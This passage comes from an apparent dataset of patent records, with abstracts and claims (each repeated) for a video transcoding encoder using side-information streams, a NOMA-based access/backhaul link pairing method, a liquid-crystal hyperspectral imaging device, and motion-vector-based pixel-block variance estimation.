for each coding mode Mk, generating one or more reconstruction residuals based respectively on one or more quantized versions of the transform block for that coding mode, and generating distortion modeling data for the coding mode based on the one or more reconstruction residuals, wherein the side information stream also includes the distortion modeling data for each coding mode and each block. 43. The video encoder of claim 42, wherein the distortion modeling data includes data characterizing a distortion estimation function Dk(q) for at least one of the one or more coding modes, wherein q represents quantization step size. 44. The video encoder of claim 40, wherein the digital circuitry is further configured to generate an encoded video stream that represents an encoded version of the input video stream, wherein the transmission circuitry is configured to transmit the encoded video stream onto the communication medium. 45. The video encoder of claim 44, wherein said generating the encoded video stream includes operating on at least one of the one or more transform blocks. 46. A video encoder comprising:
digital circuitry configured to encode an input video stream to obtain an encoded video stream, wherein said encoding includes generating a side information stream that characterizes properties of the input video stream; and transmission circuitry configured to transmit the encoded video stream and the side information stream. 47. The video encoder of claim 46, wherein the side information stream includes data characterizing rate and/or distortion properties of the input video stream. 48. The video encoder of claim 46, wherein the side information stream includes a stream of candidate motion vectors. 49. A video transcoding system comprising:
a decoder configured to receive and decode a first encoded video stream to obtain a decoded video stream; a scaling unit configured to scale the decoded video stream to a target picture resolution in order to obtain a scaled video stream; an output encoder configured to receive a side information stream associated with the first encoded video stream, and encode the scaled video stream using the side information stream in order to obtain a second encoded video stream. 50. The video transcoding system of claim 49, wherein the first encoded video stream is an encoded version of a source video stream, wherein the side information stream includes metadata that characterizes properties of the source video stream. 51. The video transcoding system of claim 49, wherein the target picture resolution is lower than a picture resolution implicit in the first encoded video stream. 52. The video transcoding system of claim 49, wherein the side information stream includes N rate information streams corresponding to N respective coding modes, wherein N is greater than or equal to one, wherein each rate information stream RISk of the N rate information streams characterizes a corresponding rate estimation function Rk(q) per block of the first encoded video stream assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 53. The video transcoding system of claim 52, wherein N=2 for a given coded picture of the first encoded video stream, wherein the rate information stream RISC corresponds to an intra coding mode, wherein the rate information stream RIS2 corresponds to an inter coding mode. 54. The video transcoding system of claim 52, wherein each rate information stream RISk characterizes the rate estimation function Rk(q) for each block with a corresponding set of one or more fitting parameters associated with a continuous functional model. 55. The video transcoding system of claim 49, wherein the side information stream includes N distortion information streams corresponding to N respective coding modes, wherein N is greater than or equal to one, wherein each distortion information stream DISk of the N distortion information streams characterizes a corresponding distortion estimation function Dk(q) per block of the first encoded video stream assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 56. The video transcoding system of claim 55, wherein N=2 for a given coded picture of the first encoded video stream, wherein the distortion information stream DIS1 corresponds to an intra coding mode, wherein the distortion information stream DIS2 corresponds to an inter coding mode. 57. The video transcoding system of claim 55, wherein each distortion information stream DISk characterizes the distortion estimation function Dk(q) for each block with a corresponding set of one or more fitting parameters associated with a continuous functional model. 58. The video encoder of claim 49, wherein the output encoder is configured to process the side information stream in order to obtain an aggregate rate estimation function RA(q) for each frame of the scaled video stream, wherein q represents quantization step size. 59. The video encoder of claim 58, wherein the output encoder is configured to further process the side information stream in order to obtain an aggregate distortion estimation function DA(q) for each frame of the scaled video stream. 60. The video transcoding system of claim 49, wherein the side information stream includes one or more candidate motion vectors for each block of the first encoded video stream, wherein the output encoder is configured to perform a fine-resolution motion vector refinement for each block that is restricted to one or more neighborhoods in motion vector space based on the one or more candidate motion vectors. 61. The video transcoding system of claim 49, wherein said decoder is configured to recover a motion vector for each block from the first encoded video stream as part of said decoding the first encoded video stream, wherein the output encoder is configured to perform a motion vector refinement for each block that is restricted to a neighborhood in motion vector space based on the motion vector for the block. 62. The video transcoding system of claim 49, wherein the side information includes one or more candidate motion vectors per block, wherein said encoding the scaled video stream includes selecting a motion vector from a set of vectors including the one or more candidate motion vectors. 63. The video transcoding system of claim 62, wherein the set of vectors also include a decoded motion vector recovered from the first encoded video stream. 64. The video transcoding system of claim 49, further comprising:
transmission circuitry configured to transmit the second encoded video stream to a remote decoder through a communication medium. 65. The video transcoding system of claim 49, wherein the output encoder is configured to receive auxiliary information and inject the auxiliary information into the scaled video stream, wherein the auxiliary information includes one or more of:
branding information of a business entity; advertising information; digital rights management (DRM) information; digital information providing watermark functionality; customized features requested by a content provider, content delivery service provider, customer or user. 66. The video transcoding system of claim 49, wherein at least one of the decoder, the scaling unit and the output encoder is implemented using software configured for execution on an array of parallel processors. 67. The video transcoding system of claim 49, wherein the decoder, the scaling unit, the output encoder are implemented on distinct subsets of processors in an array of parallel processors. | 2,400 |
9,193 | 9,193 | 15,767,181 | 2,416 | A method for integrating access and backhaul links, the method includes: obtaining information indicating a data rate requirement for a link between a first AP and a second AP; obtaining information indicating a gain of the link between the first AP and the second AP; computing, using the gain of the link, an achievable data rate for the link between the first AP and the second AP, wherein the achievable data rate is computed based on an OMA scheme; determining that the data rate requirement is greater than the achievable data rate; and as a result of determining that the data rate requirement is greater than the achievable data rate, pairing a first UE with the first AP, such that a NOMA scheme is used for the link between the first AP and second AP and the link between the first AP and the first UE. | 1. A method for adaptively integrating access and backhaul links, the method comprising:
obtaining information indicating a data rate requirement for a link between a first access point, AP, and a second AP; obtaining information indicating a gain of the link between the first AP and the second AP; computing, based on the gain of the link, an achievable data rate for the link between the first AP and the second AP, wherein the achievable data rate is computed based on an orthogonal multiple access, OMA, scheme (e.g., Time Division Multiple Access, TDMA, Frequency Division Multiple Access, FDMA); determining that a condition is true, wherein determining that the condition is true comprises determining that the data rate requirement is greater than the achievable data rate; and as a result of determining that the condition is true, pairing a first user equipment, UE with the first AP, such that a non-orthogonal multiple access, NOMA, scheme is used for the link between the first AP and the second AP and the link between the first AP and the first UE. 2. The method of claim 1, wherein the NOMA scheme is used for one or more of data uplink and/or data downlink. 3. The method of claim 1, wherein
the first AP is scheduled to transmit data to the second AP during a first time slot and using a first set of one or more frequencies, and pairing a first UE with the first AP comprises the second AP scheduling the first UE to transmit data to the second AP during the first time slot and using the first set of frequencies. 4. The method of claim 1, further comprising:
computing, based on the gain of the link, a second achievable data rate for the link between the first AP and the second AP, wherein the second achievable data rate is computed based on a NOMA scheme where the first UE and the first AP are paired; determining that a second condition is true, wherein determining that the second condition is true comprises determining that the data rate requirement is greater than the second achievable data rate; and as a result of determining that the second condition is true, pairing both the first UE and a second UE with the first AP, such that a NOMA scheme is used for the link between the first AP and the second AP, the link between the first AP and the first UE, and the link between the first AP and the second UE. 5. The method of claim 1, wherein pairing the first UE with the first AP further comprises pairing a plurality of other UEs with the first AP, wherein the first UE and the plurality of other UEs are selected to achieve the data rate requirement while minimizing a complexity measure for using the NOMA scheme. 6. The method of claim 5, further comprising obtaining data rate requirements for the plurality of other UEs, and wherein the first UE and the plurality of other UEs are further selected based on the data rate requirements for the plurality of other UEs. 7. The method of claim 1, further comprising:
a first informing step comprising informing the first UE that the first UE is selected to use the NOMA scheme for the link between the first AP and the first UE, wherein the first informing step further comprises sending an indication to the first UE of a beamforming power level. 8. The method of claim 1, further comprising:
a second informing step comprising informing a UE, for each of the first UE and any unpaired UEs, about a timing information for the UE. 9. The method of claim 7, wherein the first informing step further comprises informing each UE that has been paired with the first AP, that the UE is selected to use the NOMA scheme for the link between the first AP to the UE. 10. The method of claim 1, wherein computing, based on the gain, the achievable data rate for the link between the first AP and the second AP, comprises calculating the achievable data rate (RAP1-AP2,OMA) according to:
R
AP
1
-
AP
2
,
OMA
=
α
0
log
2
(
1
+
Pg
α
0
)
[
bit
symbol
]
where P is the transmission power of the first AP, g is the gain corresponding to the link between the first AP and the second AP, and α0 is a portion of time allocated for data transfer in the link between the first AP and the second AP. 11. An access point, the access point being adapted to:
obtain information indicating a data rate requirement for a link between a first access point, AP, and a second AP; obtain information indicating a gain of the link between the first AP and the second AP; compute, based on the gain of the link, an achievable data rate for the link between the first AP and the second AP, wherein the achievable data rate is computed based on an orthogonal multiple access, OMA, scheme (e.g., Time Division Multiple Access, TDMA, Frequency Division Multiple Access, FDMA); determine that a condition is true, wherein determining that the condition is true comprises determining that the data rate requirement is greater than the achievable data rate; and as a result of determining that the condition is true, pair a first user equipment, UE with the first AP, such that a non-orthogonal multiple access, NOMA, scheme is used for the link between the first AP and the second AP and the link between the first AP and the first UE. 12. The access point of claim 11, wherein the NOMA scheme is used for one or more of data uplink and/or data downlink. 13. The access point of claim 11, wherein
the first AP is scheduled to transmit data to the second AP during a first time slot and using a first set of one or more frequencies, and pairing a first UE with the first AP comprises the second AP scheduling the first UE to transmit data to the second AP during the first time slot and using the first set of frequencies. 14. The access point of claim 11, further adapted to:
compute, based on the gain of the link, a second achievable data rate for the link between the first AP and the second AP, wherein the second achievable data rate is computed based on a NOMA scheme where the first UE and the first AP are paired; determine that a second condition is true, wherein determining that the second condition is true comprises determining that the data rate requirement is greater than the second achievable data rate; and as a result of determining that the second condition is true, pair both the first UE and a second UE with the first AP, such that a NOMA scheme is used for the link between the first AP and the second AP, the link between the first AP and the first UE, and the link between the first AP and the second UE. 15. The access point of claim 11, wherein pairing the first UE with the first AP further comprises pairing a plurality of other UEs with the first AP, wherein the first UE and the plurality of other UEs are selected to achieve the data rate requirement while minimizing a complexity measure for using the NOMA scheme. 16. (canceled) 17. A computer program, comprising instructions which, when executed on at least one processor of a user equipment, cause the user equipment to carry out the method according to claim 1. 18. A carrier containing the computer program of claim 17, wherein the carrier is one of an electronic signal, optical signal, radio signal, or computer readable storage medium. | A method for integrating access and backhaul links, the method includes: obtaining information indicating a data rate requirement for a link between a first AP and a second AP; obtaining information indicating a gain of the link between the first AP and the second AP; computing, using the gain of the link, an achievable data rate for the link between the first AP and the second AP, wherein the achievable data rate is computed based on an OMA scheme; determining that the data rate requirement is greater than the achievable data rate; and as a result of determining that the data rate requirement is greater than the achievable data rate, pairing a first UE with the first AP, such that a NOMA scheme is used for the link between the first AP and second AP and the link between the first AP and the first UE.1. A method for adaptively integrating access and backhaul links, the method comprising:
obtaining information indicating a data rate requirement for a link between a first access point, AP, and a second AP; obtaining information indicating a gain of the link between the first AP and the second AP; computing, based on the gain of the link, an achievable data rate for the link between the first AP and the second AP, wherein the achievable data rate is computed based on an orthogonal multiple access, OMA, scheme (e.g., Time Division Multiple Access, TDMA, Frequency Division Multiple Access, FDMA); determining that a condition is true, wherein determining that the condition is true comprises determining that the data rate requirement is greater than the achievable data rate; and as a result of determining that the condition is true, pairing a first user equipment, UE with the first AP, such that a non-orthogonal multiple access, NOMA, scheme is used for the link between the first AP and the second AP and the link between the first AP and the first UE. 2. The method of claim 1, wherein the NOMA scheme is used for one or more of data uplink and/or data downlink. 3. The method of claim 1, wherein
the first AP is scheduled to transmit data to the second AP during a first time slot and using a first set of one or more frequencies, and pairing a first UE with the first AP comprises the second AP scheduling the first UE to transmit data to the second AP during the first time slot and using the first set of frequencies. 4. The method of claim 1, further comprising:
computing, based on the gain of the link, a second achievable data rate for the link between the first AP and the second AP, wherein the second achievable data rate is computed based on a NOMA scheme where the first UE and the first AP are paired; determining that a second condition is true, wherein determining that the second condition is true comprises determining that the data rate requirement is greater than the second achievable data rate; and as a result of determining that the second condition is true, pairing both the first UE and a second UE with the first AP, such that a NOMA scheme is used for the link between the first AP and the second AP, the link between the first AP and the first UE, and the link between the first AP and the second UE. 5. The method of claim 1, wherein pairing the first UE with the first AP further comprises pairing a plurality of other UEs with the first AP, wherein the first UE and the plurality of other UEs are selected to achieve the data rate requirement while minimizing a complexity measure for using the NOMA scheme. 6. The method of claim 5, further comprising obtaining data rate requirements for the plurality of other UEs, and wherein the first UE and the plurality of other UEs are further selected based on the data rate requirements for the plurality of other UEs. 7. The method of claim 1, further comprising:
a first informing step comprising informing the first UE that the first UE is selected to use the NOMA scheme for the link between the first AP and the first UE, wherein the first informing step further comprises sending an indication to the first UE of a beamforming power level. 8. The method of claim 1, further comprising:
a second informing step comprising informing a UE, for each of the first UE and any unpaired UEs, about a timing information for the UE. 9. The method of claim 7, wherein the first informing step further comprises informing each UE that has been paired with the first AP, that the UE is selected to use the NOMA scheme for the link between the first AP to the UE. 10. The method of claim 1, wherein computing, based on the gain, the achievable data rate for the link between the first AP and the second AP, comprises calculating the achievable data rate (RAP1-AP2,OMA) according to:
R
AP
1
-
AP
2
,
OMA
=
α
0
log
2
(
1
+
Pg
α
0
)
[
bit
symbol
]
where P is the transmission power of the first AP, g is the gain corresponding to the link between the first AP and the second AP, and α0 is a portion of time allocated for data transfer in the link between the first AP and the second AP. 11. An access point, the access point being adapted to:
obtain information indicating a data rate requirement for a link between a first access point, AP, and a second AP; obtain information indicating a gain of the link between the first AP and the second AP; compute, based on the gain of the link, an achievable data rate for the link between the first AP and the second AP, wherein the achievable data rate is computed based on an orthogonal multiple access, OMA, scheme (e.g., Time Division Multiple Access, TDMA, Frequency Division Multiple Access, FDMA); determine that a condition is true, wherein determining that the condition is true comprises determining that the data rate requirement is greater than the achievable data rate; and as a result of determining that the condition is true, pair a first user equipment, UE with the first AP, such that a non-orthogonal multiple access, NOMA, scheme is used for the link between the first AP and the second AP and the link between the first AP and the first UE. 12. The access point of claim 11, wherein the NOMA scheme is used for one or more of data uplink and/or data downlink. 13. The access point of claim 11, wherein
the first AP is scheduled to transmit data to the second AP during a first time slot and using a first set of one or more frequencies, and pairing a first UE with the first AP comprises the second AP scheduling the first UE to transmit data to the second AP during the first time slot and using the first set of frequencies. 14. The access point of claim 11, further adapted to:
compute, based on the gain of the link, a second achievable data rate for the link between the first AP and the second AP, wherein the second achievable data rate is computed based on a NOMA scheme where the first UE and the first AP are paired; determine that a second condition is true, wherein determining that the second condition is true comprises determining that the data rate requirement is greater than the second achievable data rate; and as a result of determining that the second condition is true, pair both the first UE and a second UE with the first AP, such that a NOMA scheme is used for the link between the first AP and the second AP, the link between the first AP and the first UE, and the link between the first AP and the second UE. 15. The access point of claim 11, wherein pairing the first UE with the first AP further comprises pairing a plurality of other UEs with the first AP, wherein the first UE and the plurality of other UEs are selected to achieve the data rate requirement while minimizing a complexity measure for using the NOMA scheme. 16. (canceled) 17. A computer program, comprising instructions which, when executed on at least one processor of a user equipment, cause the user equipment to carry out the method according to claim 1. 18. A carrier containing the computer program of claim 17, wherein the carrier is one of an electronic signal, optical signal, radio signal, or computer readable storage medium. | 2,400 |
9,194 | 9,194 | 14,527,378 | 2,482 | A method of operating a hyperspectral imaging device includes connecting electrodes on a liquid crystal variable retarder to a voltage source, rotating liquid crystal material in the liquid crystal variable retarder between a first orientation with a certain optical phase delay and a second orientation with a different optical phase delay, receiving a beam of light at an image sensor that has passed through the liquid crystal variable retarder, and producing an output signal from the image sensor. | 1. A method of operating a hyperspectral imaging device, comprising:
connecting electrodes on a liquid crystal variable retarder to a voltage source; switching the liquid crystal variable retarder between a first retardance and a second retardance, wherein the switching occurs within a specified time; receiving a beam of light at an image sensor that has passed through the liquid crystal variable retarder; and producing an output signal from the image sensor. 2. (canceled) 3. (canceled) 4. The method of claim 1, wherein switching the liquid crystal variable retarder comprises:
applying a first set of voltages to the liquid crystal variable retarder to switch the liquid crystal variable retarder to the first retardance; and applying a second set of voltages to the liquid crystal variable retarder to switch the liquid crystal variable retarder from the first retardance to the second retardance. 5. The method of claim 1, wherein the optical phase delay between ordinary and extraordinary rays changes monotonically as the liquid crystal is switched between the first retardance and the second retardance. 6. The method of claim 1, wherein switching the liquid crystal variable retarder comprises:
applying a time varying voltage consisting of frequency components at one of above or below the frequency at which the dielectric anisotropy of the liquid crystal changes sign, then applying a time varying voltage consisting of frequency components at the other of above or below the frequency at which the dielectric anisotropy of the liquid crystal changes sign. 7. The method of claim 1, further comprising applying compensation to mitigate beam walk-off. 8. The method of claim 1, further comprising:
comparing at least two output signals representing two corresponding frames of image data sensed by the image sensor; and determining an adjustment to be made to the output signals to improve image registration. 9. The method of claim 1, wherein producing an output from the image sensor comprises:
collecting sensing responses from pixels in regions on the image sensor; summing the sensing responses; and outputting the summed responses from the image sensor. 10. The method of claim 1, further comprising storing calibration data for the hyperspectral image sensor in a memory. 11. The method of claim 10, further comprising:
measuring a temperature; and using the temperature as an index into a calibration table in which is stored the calibration data. 12. A method of calibrating a hyperspectral imaging device, comprising:
illuminating a hyperspectral imaging sensor with a light source having known spectral properties, wherein the illuminating is repeated across a range of temperatures and times; sampling the light from the light source with the hyperspectral imaging sensor to obtain sampled spectral properties for particular ones of the range of temperatures and times; and calibrating a performance characteristic of the hyperspectral imaging sensor based upon comparing the sampled spectral properties of the light source to the known spectral properties. 13. The method of claim 12, wherein calibrating the performance characteristic comprises calibrating a retardance controller with optical retardance versus applied time-varying voltage. 14. The method of claim 12, wherein calibrating the performance characteristic comprises calibrating a retardance controller with performance versus temperature for the range of temperatures. 15. The method of claim 12, wherein illuminating the hyperspectral imaging sensor with a light source comprises illuminating the hyperspectral imaging sensor with a light source having at least one defined spectral peak. 16. The method of claim 15, further comprising determining an adjustment to outputs of the image sensor based on measured differences between the at least one defined spectral peak and at least one detected spectral peak at the image sensor. 17. The method of claim 16, wherein sampling the light comprises sampling the light from selected regions of the image sensor and using the adjustment to determine a response of a liquid crystal variable retarder in the hyperspectral image sensor. 18. A method of operating a hyperspectral imaging device, comprising:
receiving a light beam at a liquid crystal retarding device; and driving the liquid crystal retarding device with a pre-computed voltage waveform, wherein the voltage waveform is selected to reach a target optical retardance over time for the liquid crystal retarding device. 19. The method of claim 18, further comprising:
obtaining a first hyperspectral image; and using information from the first hyperspectral image to correct the voltage waveform prior to obtaining a next hyperspectral image. 20. The method of claim 18, further comprising storing corrections to the voltage waveform in a memory. 21. The method of claim 18, wherein the pre-computed voltage waveform is a dynamic waveform. 22. The method of claim 18, wherein the pre-computed voltage waveform causes a retardance of the variable retarder to vary linearly over time. 23. The method of claim 18, further comprising sensing the light beam at an image sensor after the light beam passes through the liquid crystal retarder. 24. The method of claim 19, wherein using information to correct the voltage waveform comprises finding an optimal time-varying voltage waveform for each total image acquisition time and each temperature. 25. The method of claim 18, wherein two individual image frames are acquired within a time interval shorter than a response time of the liquid crystal variable retarder. 26. The method of claim 12, wherein sampling the light from the source occurs at a time interval faster than a response time of a liquid crystal variable retarder in the hyperspectral imaging sensor. | A method of operating a hyperspectral imaging device includes connecting electrodes on a liquid crystal variable retarder to a voltage source, rotating liquid crystal material in the liquid crystal variable retarder between a first orientation with a certain optical phase delay and a second orientation with a different optical phase delay, receiving a beam of light at an image sensor that has passed through the liquid crystal variable retarder, and producing an output signal from the image sensor.1. A method of operating a hyperspectral imaging device, comprising:
connecting electrodes on a liquid crystal variable retarder to a voltage source; switching the liquid crystal variable retarder between a first retardance and a second retardance, wherein the switching occurs within a specified time; receiving a beam of light at an image sensor that has passed through the liquid crystal variable retarder; and producing an output signal from the image sensor. 2. (canceled) 3. (canceled) 4. The method of claim 1, wherein switching the liquid crystal variable retarder comprises:
applying a first set of voltages to the liquid crystal variable retarder to switch the liquid crystal variable retarder to the first retardance; and applying a second set of voltages to the liquid crystal variable retarder to switch the liquid crystal variable retarder from the first retardance to the second retardance. 5. The method of claim 1, wherein the optical phase delay between ordinary and extraordinary rays changes monotonically as the liquid crystal is switched between the first retardance and the second retardance. 6. The method of claim 1, wherein switching the liquid crystal variable retarder comprises:
applying a time varying voltage consisting of frequency components at one of above or below the frequency at which the dielectric anisotropy of the liquid crystal changes sign, then applying a time varying voltage consisting of frequency components at the other of above or below the frequency at which the dielectric anisotropy of the liquid crystal changes sign. 7. The method of claim 1, further comprising applying compensation to mitigate beam walk-off. 8. The method of claim 1, further comprising:
comparing at least two output signals representing two corresponding frames of image data sensed by the image sensor; and determining an adjustment to be made to the output signals to improve image registration. 9. The method of claim 1, wherein producing an output from the image sensor comprises:
collecting sensing responses from pixels in regions on the image sensor; summing the sensing responses; and outputting the summed responses from the image sensor. 10. The method of claim 1, further comprising storing calibration data for the hyperspectral image sensor in a memory. 11. The method of claim 10, further comprising:
measuring a temperature; and using the temperature as an index into a calibration table in which is stored the calibration data. 12. A method of calibrating a hyperspectral imaging device, comprising:
illuminating a hyperspectral imaging sensor with a light source having known spectral properties, wherein the illuminating is repeated across a range of temperatures and times; sampling the light from the light source with the hyperspectral imaging sensor to obtain sampled spectral properties for particular ones of the range of temperatures and times; and calibrating a performance characteristic of the hyperspectral imaging sensor based upon comparing the sampled spectral properties of the light source to the known spectral properties. 13. The method of claim 12, wherein calibrating the performance characteristic comprises calibrating a retardance controller with optical retardance versus applied time-varying voltage. 14. The method of claim 12, wherein calibrating the performance characteristic comprises calibrating a retardance controller with performance versus temperature for the range of temperatures. 15. The method of claim 12, wherein illuminating the hyperspectral imaging sensor with a light source comprises illuminating the hyperspectral imaging sensor with a light source having at least one defined spectral peak. 16. The method of claim 15, further comprising determining an adjustment to outputs of the image sensor based on measured differences between the at least one defined spectral peak and at least one detected spectral peak at the image sensor. 17. The method of claim 16, wherein sampling the light comprises sampling the light from selected regions of the image sensor and using the adjustment to determine a response of a liquid crystal variable retarder in the hyperspectral image sensor. 18. A method of operating a hyperspectral imaging device, comprising:
receiving a light beam at a liquid crystal retarding device; and driving the liquid crystal retarding device with a pre-computed voltage waveform, wherein the voltage waveform is selected to reach a target optical retardance over time for the liquid crystal retarding device. 19. The method of claim 18, further comprising:
obtaining a first hyperspectral image; and using information from the first hyperspectral image to correct the voltage waveform prior to obtaining a next hyperspectral image. 20. The method of claim 18, further comprising storing corrections to the voltage waveform in a memory. 21. The method of claim 18, wherein the pre-computed voltage waveform is a dynamic waveform. 22. The method of claim 18, wherein the pre-computed voltage waveform causes a retardance of the variable retarder to vary linearly over time. 23. The method of claim 18, further comprising sensing the light beam at an image sensor after the light beam passes through the liquid crystal retarder. 24. The method of claim 19, wherein using information to correct the voltage waveform comprises finding an optimal time-varying voltage waveform for each total image acquisition time and each temperature. 25. The method of claim 18, wherein two individual image frames are acquired within a time interval shorter than a response time of the liquid crystal variable retarder. 26. The method of claim 12, wherein sampling the light from the source occurs at a time interval faster than a response time of a liquid crystal variable retarder in the hyperspectral imaging sensor. | 2,400 |
9,195 | 9,195 | 16,377,524 | 2,419 | The present disclosure is directed to techniques for determining variance of a pixel block in a frame of video based on variance of pixel blocks in a reference frame of the video, instead of directly, for example, by calculating variance based on pixel values of the pixel block. The techniques include identifying a motion vector for a pixel block in a current frame, the motion vector pointing to a pixel block in a reference frame. The techniques also include determining the cost associated with the motion vector and comparing the cost to first and second thresholds. The techniques include determining the variance for the pixel block of the current frame based on the comparison of the cost to the first and second threshold and based on the variance of the pixel block of the reference frame. | 1. A method for determining a variance for a pixel block, the method comprising:
identifying a motion vector for the pixel block, the motion vector being associated with a second pixel block of a reference frame; determining a cost for the pixel block, the cost indicating a degree of similarity between the pixel block and the second pixel block; and determining the variance for the pixel block based on the cost. 2. The method of claim 1, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is below a first threshold; and responsive to determining that the cost is below the first threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame. 3. The method of claim 1, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold but below a second threshold; and responsive to determining that the cost is above the first threshold but below the second threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame modified by a correlation factor. 4. The method of claim 3, wherein:
the correlation factor is based on a correlation function that is based on video training data. 5. The method of claim 1, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold and a second threshold; and responsive to determining that the cost is above both the first threshold and the second threshold, determining the variance for the pixel block directly based on the pixels of the pixel block. 6. The method of claim 1, wherein determining the variance comprises:
determining that costs for a threshold number of blocks in a current frame in which the pixel block exists are above both a first threshold and second threshold; and responsive to determining that the costs for the threshold number of blocks are above the first threshold and the second threshold, directly determining the variance for all pixel blocks of the current frame based on pixel values of each respective pixel block. 7. The method of claim 1, wherein identifying the motion vector for the pixel block comprises:
identifying a set of candidate motion vectors that point to pixel blocks of the reference frame within a search area; determining costs for the pixel blocks of the reference frame within the search area; identifying a cost of the determined costs; and identifying, as the motion vector for the pixel block, the candidate motion vector associated with the identified cost. 8. The method of claim 7, wherein determining the costs for each of the pixel blocks comprises:
applying a mean absolute difference technique or a mean squared error technique on pixels of the pixel blocks. 9. The method of claim 1, wherein the reference frame comprises a frame prior to or after a current frame in which the pixel block exists. 10. A computer system for determining a variance for a pixel block, the computer system comprising:
a processor; and a memory storing instructions for execution by the processor, the instructions causing the processor to:
identify a motion vector for the pixel block, the motion vector being associated with a second pixel block of a reference frame;
determine a cost for the pixel block, the cost indicating a degree of similarity between the pixel block and the second pixel block; and
determine the variance for the pixel block based on the cost. 11. The computer system of claim 10, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is below a first threshold; and responsive to determining that the cost is below the first threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame. 12. The computer system of claim 10, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold but below a second threshold; and responsive to determining that the cost is above the first threshold but below the second threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame modified by a correlation factor. 13. The computer system of claim 12, wherein:
the correlation factor is based on a correlation function that is based on video training data. 14. The computer system of claim 10, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold and a second threshold; and responsive to determining that the cost is above both the first threshold and the second threshold, determining the variance for the pixel block directly based on the pixels of the pixel block. 15. The computer system of claim 10, wherein determining the variance comprises:
determining that costs for a threshold number of blocks in a current frame in which the pixel block exists are above both a first threshold and second threshold; and responsive to determining that the costs for the threshold number of blocks are above the first threshold and the second threshold, directly determining the variance for all pixel blocks of the current frame based on pixel values of each respective pixel block. 16. The computer system of claim 10, wherein identifying the motion vector for the pixel block comprises:
identifying a set of candidate motion vectors that point to pixel blocks of the reference frame within a search area; determining costs for the pixel blocks of the reference frame within the search area; identifying a cost of the determined costs; and identifying, as the motion vector for the pixel block, the candidate motion vector associated with the identified cost. 17. The computer system of claim 16, wherein determining the costs for each of the pixel blocks comprises:
applying a mean absolute difference technique or a mean squared error technique on pixels of the pixel blocks. 18. The computer system of claim 10, wherein the reference frame comprises a frame prior to or after a current frame in which the pixel block exists. 19. A non-transitory computer-readable medium storing instructions that, when executed by a processor, cause the processor to execute a method for determining a variance for a pixel block, the method comprising:
identifying a motion vector for the pixel block, the motion vector being associated with a second pixel block of a reference frame; determining a cost for the pixel block, the cost indicating a degree of similarity between the pixel block and the second pixel block; and determining the variance for the pixel block based on the cost. 20. The non-transitory computer-readable medium of claim 19, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is below a first threshold; and responsive to determining that the cost is below the first threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame. | The present disclosure is directed to techniques for determining variance of a pixel block in a frame of video based on variance of pixel blocks in a reference frame of the video, instead of directly, for example, by calculating variance based on pixel values of the pixel block. The techniques include identifying a motion vector for a pixel block in a current frame, the motion vector pointing to a pixel block in a reference frame. The techniques also include determining the cost associated with the motion vector and comparing the cost to first and second thresholds. The techniques include determining the variance for the pixel block of the current frame based on the comparison of the cost to the first and second threshold and based on the variance of the pixel block of the reference frame.1. A method for determining a variance for a pixel block, the method comprising:
identifying a motion vector for the pixel block, the motion vector being associated with a second pixel block of a reference frame; determining a cost for the pixel block, the cost indicating a degree of similarity between the pixel block and the second pixel block; and determining the variance for the pixel block based on the cost. 2. The method of claim 1, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is below a first threshold; and responsive to determining that the cost is below the first threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame. 3. The method of claim 1, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold but below a second threshold; and responsive to determining that the cost is above the first threshold but below the second threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame modified by a correlation factor. 4. The method of claim 3, wherein:
the correlation factor is based on a correlation function that is based on video training data. 5. The method of claim 1, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold and a second threshold; and responsive to determining that the cost is above both the first threshold and the second threshold, determining the variance for the pixel block directly based on the pixels of the pixel block. 6. The method of claim 1, wherein determining the variance comprises:
determining that costs for a threshold number of blocks in a current frame in which the pixel block exists are above both a first threshold and second threshold; and responsive to determining that the costs for the threshold number of blocks are above the first threshold and the second threshold, directly determining the variance for all pixel blocks of the current frame based on pixel values of each respective pixel block. 7. The method of claim 1, wherein identifying the motion vector for the pixel block comprises:
identifying a set of candidate motion vectors that point to pixel blocks of the reference frame within a search area; determining costs for the pixel blocks of the reference frame within the search area; identifying a cost of the determined costs; and identifying, as the motion vector for the pixel block, the candidate motion vector associated with the identified cost. 8. The method of claim 7, wherein determining the costs for each of the pixel blocks comprises:
applying a mean absolute difference technique or a mean squared error technique on pixels of the pixel blocks. 9. The method of claim 1, wherein the reference frame comprises a frame prior to or after a current frame in which the pixel block exists. 10. A computer system for determining a variance for a pixel block, the computer system comprising:
a processor; and a memory storing instructions for execution by the processor, the instructions causing the processor to:
identify a motion vector for the pixel block, the motion vector being associated with a second pixel block of a reference frame;
determine a cost for the pixel block, the cost indicating a degree of similarity between the pixel block and the second pixel block; and
determine the variance for the pixel block based on the cost. 11. The computer system of claim 10, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is below a first threshold; and responsive to determining that the cost is below the first threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame. 12. The computer system of claim 10, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold but below a second threshold; and responsive to determining that the cost is above the first threshold but below the second threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame modified by a correlation factor. 13. The computer system of claim 12, wherein:
the correlation factor is based on a correlation function that is based on video training data. 14. The computer system of claim 10, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold and a second threshold; and responsive to determining that the cost is above both the first threshold and the second threshold, determining the variance for the pixel block directly based on the pixels of the pixel block. 15. The computer system of claim 10, wherein determining the variance comprises:
